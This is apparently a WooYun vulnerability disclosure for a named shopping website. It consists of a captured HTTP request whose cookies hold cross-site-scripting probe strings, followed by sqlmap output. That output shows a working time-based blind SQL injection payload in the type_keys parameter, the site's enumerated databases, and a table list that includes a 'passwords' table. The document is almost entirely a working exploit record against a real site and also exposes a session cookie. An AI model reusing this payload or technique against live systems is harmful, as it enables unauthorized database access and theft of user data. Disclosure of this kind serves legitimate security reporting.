WooYun.org

GET /i/goods/?act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1,1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.iliangcang.com:80/
Cookie: PHPSESSID=ng7n8q9f3cjhu90sgc9f2fhm34; CNZZDATA1255589131=1820958677-1442496092-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1442496092; Hm_lvt_e1ff3456921b2853f7a913e1b4d776c0=1442501718,1442501963,1442502082,1442502323; Hm_lpvt_e1ff3456921b2853f7a913e1b4d776c0=1442502323; HMACCOUNT=2BF61C215E56F16E; looyu_id=674639192215e9e691bb2fb801024e6986_53645%3A1; looyu_53645=v%3A674639192215e9e691bb2fb801024e6986%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m188.looyu.com/monitor; _jzqco=%7C%7C%7C%7C%7C1.1235655964.1442499463200.1442501593179.1442502323250.1442501593179.1442502323250.0.0.0.7.7; __utmt=1; __utma=248775135.1341662073.1442499463.1442499463.1442499463.1; __utmb=248775135.6.10.1442499463; __utmc=248775135; __utmz=248775135.1442499463.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); MECHAT_LVTime=1442502323318; MECHAT_CKID=cookieVal=006600144249962600255771; MECHAT-OLDFRIEND=true
Host: www.iliangcang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sqlmap identified the following injection point(s) with a total of 152 HTTP(s) requests:
---
Parameter: type_keys (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ
---
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: type_keys (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ
---
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] jliangcang
[*] test

back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] jliangcang
[*] test
Database: jliangcang
[35 tables]
+-----------------------+
| CPG_filetypes         |
| ClassificationNode    |
| DEPT                  |
| EPIXEIRISI            |
| Economy               |
| ORDERS                |
| ORDERSTATUS           |
| SALES                 |
| Parameter             |
| session               |
| bombing               |
| business              |
| companies             |
| cv_pests_diseases     |
| dtb_send_history      |
| e107_user             |
| experimental_data_set |
| ezin_users            |
| help_topic            |
| identification        |
| item_master_seq       |
| medicalprocedure      |
| mushroom_test_results |
| object                |
| passwords             |
| pricegroup            |
| principal             |
| queries               |
| records               |
| region                |
| tag                   |
| tbl_event             |
| tf_settings           |
| userlist              |
| vendor_types          |
+-----------------------+